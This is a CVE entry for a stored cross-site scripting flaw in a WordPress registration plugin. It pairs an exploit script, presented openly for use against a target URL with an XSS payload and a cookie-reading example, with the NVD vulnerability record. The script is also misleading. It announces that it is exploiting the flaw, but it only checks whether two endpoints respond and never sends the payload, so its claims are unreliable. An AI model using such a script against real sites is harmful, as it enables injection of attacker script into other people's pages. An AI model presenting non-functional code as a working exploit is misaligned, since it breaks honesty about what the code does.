CVE-2025-12160

#!/usr/bin/env python3 # CVE-2025-12160 PoC - Simple User Registration WordPress Plugin Stored XSS # Target: WordPress with Simple User Registration plugin <= 6.6 import requests import sys from urllib.parse import quote def exploit_stored_xss(target_url, payload): """ Exploit the stored XSS vulnerability via wpr_admin_msg parameter """ # The payload is injected via wpr_admin_msg parameter # This is typically done during registration or settings configuration # Example payload: <script>alert(document.cookie)</script> encoded_payload = quote(payload) # Target endpoint (typical WordPress registration endpoint) endpoints = [ f"{target_url}/wp-login.php?action=register", f"{target_url}/wp-admin/admin.php?page=wpregmnt_settings" ] print(f"[*] Target: {target_url}") print(f"[*] Payload: {payload}") print(f"[*] Exploiting CVE-2025-12160...") # Note: Actual exploitation requires identifying the specific # parameter injection point in the plugin's registration flow for endpoint in endpoints: try: response = requests.get(endpoint, timeout=10) print(f"[*] Checking endpoint: {endpoint}") if response.status_code == 200: print(f"[+] Endpoint reachable: {endpoint}") except requests.RequestException as e: print(f"[-] Error accessing {endpoint}: {e}") print("\n[!] Manual verification required:") print(f"[!] Navigate to affected pages and check if payload executes") print(f"[!] Look for the injected script in page source: {payload}") if __name__ == "__main__": if len(sys.argv) < 2: print(f"Usage: python3 {sys.argv[0]} <target_url> [payload]") sys.exit(1) target = sys.argv[1] xss_payload = sys.argv[2] if len(sys.argv) > 2 else "<script>alert('XSS-CVE-2025-12160')</script>" exploit_stored_xss(target, xss_payload)

{"cve": {"id": "CVE-2025-12160", "sourceIdentifier": "[email protected]", "published": "2025-11-21T10:15:47.910", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Simple User Registration plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'wpr_admin_msg' parameter in all versions up to, and including, 6.6 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3396064%40wp-registration&new=3396064%40wp-registration&sfp_email=&sfph_mail=", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/9bb5e60d-f7c9-4b47-ba6f-0f2d1d060263?source=cve", "source": "[email protected]"}]}}